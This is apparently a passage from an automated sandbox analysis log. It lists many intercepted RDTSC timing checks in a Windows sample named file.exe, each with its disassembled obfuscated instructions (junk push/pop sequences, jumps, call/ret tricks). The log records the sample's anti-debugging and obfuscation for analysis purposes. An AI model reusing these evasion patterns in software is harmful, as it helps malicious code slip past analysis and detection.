                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138CB46 second address: 138CB5B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65A4C18F9Ah 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138CF50 second address: 138CF64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007F65A4502596h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnl 00007F65A4502596h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138F83B second address: 138F840 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138FA11 second address: 138FA4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 nop 0x00000008 xor ecx, 35F3DBB1h 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push edi 0x00000013 call 00007F65A4502598h 0x00000018 pop edi 0x00000019 mov dword ptr [esp+04h], edi 0x0000001d add dword ptr [esp+04h], 00000017h 0x00000025 inc edi 0x00000026 push edi 0x00000027 ret 0x00000028 pop edi 0x00000029 ret 0x0000002a push 7BD7BA70h 0x0000002f pushad 0x00000030 push eax 0x00000031 push edx 0x00000032 ja 00007F65A4502596h 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138FA4E second address: 138FAD2 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F65A4C18F96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b jmp 00007F65A4C18FA7h 0x00000010 pop ecx 0x00000011 popad 0x00000012 xor dword ptr [esp], 7BD7BAF0h 0x00000019 sbb ecx, 036391D5h 0x0000001f push 00000003h 0x00000021 xor si, A262h 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push eax 0x0000002b call 00007F65A4C18F98h 0x00000030 pop eax 0x00000031 mov dword ptr [esp+04h], eax 0x00000035 add dword ptr [esp+04h], 00000014h 0x0000003d inc eax 0x0000003e push eax 0x0000003f ret 0x00000040 pop eax 0x00000041 ret 0x00000042 push 00000003h 0x00000044 jp 00007F65A4C18F9Ch 0x0000004a mov ecx, dword ptr [ebp+122D2C80h] 0x00000050 call 00007F65A4C18F99h 0x00000055 push ebx 0x00000056 pushad 0x00000057 pushad 0x00000058 popad 0x00000059 pushad 0x0000005a popad 0x0000005b popad 0x0000005c pop ebx 0x0000005d push eax 0x0000005e js 00007F65A4C18FA4h 0x00000064 push eax 0x00000065 push edx 0x00000066 js 00007F65A4C18F96h 0x0000006c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138FAD2 second address: 138FB05 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jmp 00007F65A45025A6h 0x0000000f mov eax, dword ptr [eax] 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F65A450259Fh 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138FB05 second address: 138FB79 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65A4C18FA5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d jmp 00007F65A4C18F9Dh 0x00000012 pop eax 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 call 00007F65A4C18F98h 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 add dword ptr [esp+04h], 0000001Ah 0x00000028 inc eax 0x00000029 push eax 0x0000002a ret 0x0000002b pop eax 0x0000002c ret 0x0000002d xor dh, 00000074h 0x00000030 stc 0x00000031 lea ebx, dword ptr [ebp+12451770h] 0x00000037 jmp 00007F65A4C18FA2h 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 jno 00007F65A4C18F96h 0x00000047 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138FB79 second address: 138FB83 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F65A4502596h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138FC06 second address: 138FC4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 add dword ptr [ebp+122D33A2h], edi 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007F65A4C18F98h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 0000001Ah 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 cld 0x0000002a push 8B8C25AEh 0x0000002f push eax 0x00000030 push edx 0x00000031 push ebx 0x00000032 jmp 00007F65A4C18F9Ch 0x00000037 pop ebx 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138FC4D second address: 138FCA6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65A450259Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 7473DAD2h 0x00000010 mov cl, 05h 0x00000012 push 00000003h 0x00000014 push 00000000h 0x00000016 push ecx 0x00000017 call 00007F65A4502598h 0x0000001c pop ecx 0x0000001d mov dword ptr [esp+04h], ecx 0x00000021 add dword ptr [esp+04h], 00000017h 0x00000029 inc ecx 0x0000002a push ecx 0x0000002b ret 0x0000002c pop ecx 0x0000002d ret 0x0000002e push 00000000h 0x00000030 mov dword ptr [ebp+122D1FBAh], eax 0x00000036 push 00000003h 0x00000038 xor dword ptr [ebp+122D37ADh], ecx 0x0000003e push 9378774Dh 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 je 00007F65A4502596h 0x0000004c push esi 0x0000004d pop esi 0x0000004e popad 0x0000004f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138FCA6 second address: 138FCB0 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F65A4C18F9Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AF1D6 second address: 13AF1DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AF1DC second address: 13AF1E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AF347 second address: 13AF364 instructions: 0x00000000 rdtsc 0x00000002 je 00007F65A4502598h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F65A450259Ch 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AF364 second address: 13AF368 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AFCC0 second address: 13AFCCA instructions: 0x00000000 rdtsc 0x00000002 js 00007F65A4502596h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B0137 second address: 13B0151 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F65A4C18FA1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B02BE second address: 13B02CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007F65A4502596h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B02CE second address: 13B02D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A5B85 second address: 13A5B89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A5B89 second address: 13A5B99 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65A4C18F9Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A5B99 second address: 13A5BA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F65A4502596h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A5BA5 second address: 13A5BA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B09F3 second address: 13B0A02 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F65A4502596h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B0A02 second address: 13B0A26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push esi 0x00000009 jmp 00007F65A4C18FA8h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B0A26 second address: 13B0A32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F65A4502596h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B0CBF second address: 13B0CC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B5261 second address: 13B5271 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jl 00007F65A450259Eh 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B5271 second address: 13B527F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007F65A4C18F96h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B527F second address: 13B5283 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1388461 second address: 1388465 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B9720 second address: 13B9726 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B9726 second address: 13B9738 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F65A4C18F98h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c pushad 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B9738 second address: 13B9762 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 jmp 00007F65A45025A8h 0x0000000d popad 0x0000000e popad 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push ecx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BD66F second address: 13BD680 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jbe 00007F65A4C18F96h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BDC58 second address: 13BDC5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C01BF second address: 13C01EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65A4C18F9Fh 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007F65A4C18FA8h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C03DF second address: 13C03E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C03E3 second address: 13C03ED instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C03ED second address: 13C03F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C0A5E second address: 13C0A63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C0A8E second address: 13C0A92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C0A92 second address: 13C0A96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C0A96 second address: 13C0A9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C0A9C second address: 13C0ADF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jg 00007F65A4C18F9Eh 0x0000000f jnl 00007F65A4C18F98h 0x00000015 xchg eax, ebx 0x00000016 sub dword ptr [ebp+12475683h], ecx 0x0000001c nop 0x0000001d pushad 0x0000001e pushad 0x0000001f jnl 00007F65A4C18F96h 0x00000025 jp 00007F65A4C18F96h 0x0000002b popad 0x0000002c jmp 00007F65A4C18F9Ah 0x00000031 popad 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 jnp 00007F65A4C18F96h 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C0D10 second address: 13C0D15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C0DB6 second address: 13C0DC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F65A4C18F96h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C1049 second address: 13C105F instructions: 0x00000000 rdtsc 0x00000002 jc 00007F65A450259Ch 0x00000008 jnp 00007F65A4502596h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C105F second address: 13C1064 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C1DA0 second address: 13C1DA6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C1DA6 second address: 13C1DAB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C2FBF second address: 13C3017 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F65A450259Ah 0x0000000b popad 0x0000000c push eax 0x0000000d push edi 0x0000000e jmp 00007F65A45025A0h 0x00000013 pop edi 0x00000014 nop 0x00000015 movzx edi, si 0x00000018 push 00000000h 0x0000001a movsx esi, di 0x0000001d push 00000000h 0x0000001f jmp 00007F65A450259Dh 0x00000024 xchg eax, ebx 0x00000025 jmp 00007F65A45025A0h 0x0000002a push eax 0x0000002b push eax 0x0000002c push edx 0x0000002d jl 00007F65A4502598h 0x00000033 push edi 0x00000034 pop edi 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C3B65 second address: 13C3BC2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 jmp 00007F65A4C18F9Fh 0x0000000d nop 0x0000000e add dword ptr [ebp+122D362Eh], ebx 0x00000014 mov dword ptr [ebp+122D2758h], ecx 0x0000001a push 00000000h 0x0000001c pushad 0x0000001d jbe 00007F65A4C18FAEh 0x00000023 call 00007F65A4C18FA7h 0x00000028 pop eax 0x00000029 mov cx, 4E83h 0x0000002d popad 0x0000002e push 00000000h 0x00000030 xor dword ptr [ebp+122D3153h], ecx 0x00000036 xchg eax, ebx 0x00000037 push eax 0x00000038 push edx 0x00000039 jbe 00007F65A4C18F98h 0x0000003f pushad 0x00000040 popad 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C3BC2 second address: 13C3BDC instructions: 0x00000000 rdtsc 0x00000002 jl 00007F65A45025A0h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C3BDC second address: 13C3BE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C3BE3 second address: 13C3BEE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F65A4502596h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C4531 second address: 13C453B instructions: 0x00000000 rdtsc 0x00000002 jo 00007F65A4C18F9Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C4F9A second address: 13C4FAC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F65A450259Ah 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C59FF second address: 13C5A05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C64CD second address: 13C64E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jo 00007F65A4502598h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 jne 00007F65A4502596h 0x00000018 pop esi 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C658A second address: 13C658E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C658E second address: 13C65A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007F65A450259Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C65A0 second address: 13C65A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C6284 second address: 13C629C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007F65A450259Bh 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C850A second address: 13C850E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C85B6 second address: 13C85BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C6DAC second address: 13C6DB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C85BC second address: 13C85C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C6DB9 second address: 13C6DC7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F65A4C18F96h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C85C0 second address: 13C85C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C960C second address: 13C9610 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CA532 second address: 13CA537 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C974A second address: 13C976C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65A4C18FA7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CA537 second address: 13CA5E0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F65A45025A2h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007F65A4502598h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 00000019h 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 push esi 0x00000029 mov bh, FDh 0x0000002b pop ebx 0x0000002c sub dword ptr [ebp+122D17D0h], ebx 0x00000032 push 00000000h 0x00000034 sub ebx, dword ptr [ebp+12452F30h] 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push ecx 0x0000003f call 00007F65A4502598h 0x00000044 pop ecx 0x00000045 mov dword ptr [esp+04h], ecx 0x00000049 add dword ptr [esp+04h], 0000001Dh 0x00000051 inc ecx 0x00000052 push ecx 0x00000053 ret 0x00000054 pop ecx 0x00000055 ret 0x00000056 jmp 00007F65A45025A5h 0x0000005b xchg eax, esi 0x0000005c jmp 00007F65A45025A3h 0x00000061 push eax 0x00000062 push eax 0x00000063 push edx 0x00000064 jns 00007F65A4502598h 0x0000006a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C976C second address: 13C9770 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C9770 second address: 13C97D2 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F65A4502596h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b nop 0x0000000c mov bh, FAh 0x0000000e push dword ptr fs:[00000000h] 0x00000015 adc bx, 6D25h 0x0000001a mov dword ptr fs:[00000000h], esp 0x00000021 mov bx, cx 0x00000024 mov eax, dword ptr [ebp+122D0C4Dh] 0x0000002a push 00000000h 0x0000002c push ebp 0x0000002d call 00007F65A4502598h 0x00000032 pop ebp 0x00000033 mov dword ptr [esp+04h], ebp 0x00000037 add dword ptr [esp+04h], 00000018h 0x0000003f inc ebp 0x00000040 push ebp 0x00000041 ret 0x00000042 pop ebp 0x00000043 ret 0x00000044 add bl, 00000079h 0x00000047 push FFFFFFFFh 0x00000049 jg 00007F65A4502598h 0x0000004f nop 0x00000050 push eax 0x00000051 push edx 0x00000052 jp 00007F65A4502598h 0x00000058 pushad 0x00000059 popad 0x0000005a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C97D2 second address: 13C97D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CB65E second address: 13CB68A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65A45025A6h 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F65A450259Eh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C97D8 second address: 13C97DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
